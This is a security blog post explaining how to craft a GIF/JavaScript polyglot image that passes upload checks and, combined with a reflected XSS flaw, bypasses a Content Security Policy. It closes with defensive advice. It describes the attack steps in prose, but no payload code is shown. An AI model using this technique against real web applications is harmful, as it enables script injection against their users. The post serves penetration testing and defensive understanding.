The content of this article was also presented by Sam at the 2016 Unrest Conference.
In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?
Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).
Content Security Policy (CSP)
The CSP is set by the web server in the form of a header and informs the user’s browser to only load and execute objects that originate from a certain set of whitelisted places. For example, a common implementation of the CSP header is to ensure the browser only accepts scripts that come from your domain and block the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). This CSP is a recommended security header to mitigate the damage caused by Cross-Site Scripting vulnerabilities. The header achieves this by narrowing the attack surface available for malicious scripts to be loaded from. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.
Cross-Site Scripting (XSS)
XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government’s My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server. They are usually executed when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ with the web application as it is loaded alongside other client side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from being executed in the browser which in theory mitigates the dangers of a reflected XSS and protects the user.
CSP in action — and how to get around it
Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.
In humans, a ‘polyglot’ is someone who can speaks several languages. In the computer world it means code that is valid in several programming languages.
The code snippets in Figure 1 and Figure 2 are identical and yet also cross-compatible. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.
You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.
GIF images only support a 256 colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety making the format inefficient for displaying detailed clips of any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter — no joke).
The attack this blog will demonstrate only requires knowledge of the ‘Header’, ‘Trailer’ and ‘Logical Screen Descriptor’ (LSD). The data in between these represent each frame of a GIF image. At least one frame is expected in a valid GIF. All GIF images begin with the signature ‘GIF’ followed by the version represented as ‘87a’ or ‘89a’ in the header.
The following seven bytes of a GIF image make up the LSD which informs the image decoder of properties that effect the whole image. Firstly, the canvas width and height values which are stored as unsigned 16-bit integers. A ’16-bit unsigned integer’ is a number between 0 and 65,535 that cannot be negative (It wouldn’t make much sense to have a negative canvas size!).
It is also important to understand that this data in the GIF format is represented in ‘little-endian’ which means the least significant byte is read first by the decoder. In Figure 6 we can see the canvas size is set as width: ‘0A00’ and height: ‘0A00’. While seemingly backwards for humans, little-endian dictates the decoder read the smaller byte first, width: ‘000A’ and height: ‘000A’ which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is represented by hexadecimal ‘3B’ which when encoded as ASCII represents a semicolon.
Most image decoders, including browsers, will ignore anything after the trailing semicolon making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image; data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw/unedited image after it’s uploaded to the server — see the ‘limitations’ section of this blog for more information.
Creating the GIF/JS Polyglot
To create our malicious image, we are using a small, non-animated GIF image as seen in Figure 7. Its ASCII encoded output is represented below:
One method of creating GIF/JS polyglots is by manipulating the LSD to begin a JS comment block as seen in Figure 9. After the GIF trailer we close the comment block and include our payload.
You will notice that in order to implement the ‘/*’ (begin comment block) JS command we have changed the value of the first two bytes of the LSD which correspond to the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’ which when interpreted as little-endian by the image decoder is ‘2A 2F = 10799’. While we still have a valid GIF image, it has a pretty whacky canvas size as seen in the output below:
However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.
When we try and execute the image as JS the engine reads the GIF header as a variable name, it ignores the comment block and then continues by setting the variable to equal ‘1’ which is just a dummy variable to ensure the JS syntax remains valid. Then our payload is executed.
The image passes standard image validation techniques used by web applications which often rely on confirming the ‘magic numbers’ (a fancier way of saying header) of the image. Once our image is uploaded to the server we effectively have a valid JS file originating from the web application’s domain which falls within the context of the CSP.
As it stands the image is loaded into to the web application through the use of the HTML ‘img’ tag which informs the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image with the HTML ‘script src’ tag.
The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.
- Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited number of JS characters that can be used in the LSD the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
- Server side image manipulation that resizes the image will edit the canvas size in the LSD; corrupting our polyglot. If it’s not possible to locate the original unedited image through the web application, then the image will not execute as JS.
While Figure 14 demos a rather mundane script execution it confirms we now have a method of uploading and executing an XSS attack regardless of the CSP directive. The stored JS in our image acts as an uploaded script file satisfying the CSP same origin requirements.
This attack proves that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing GIF/XSS polyglots are a powerful tool to leverage the consequence of improper output sanitation.
While still recommended, the CSP header should be implemented with the understanding that it’s the last line of defence against XSS attacks that might protect your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.
Article by Sam Reid, Security Specialist, Hivint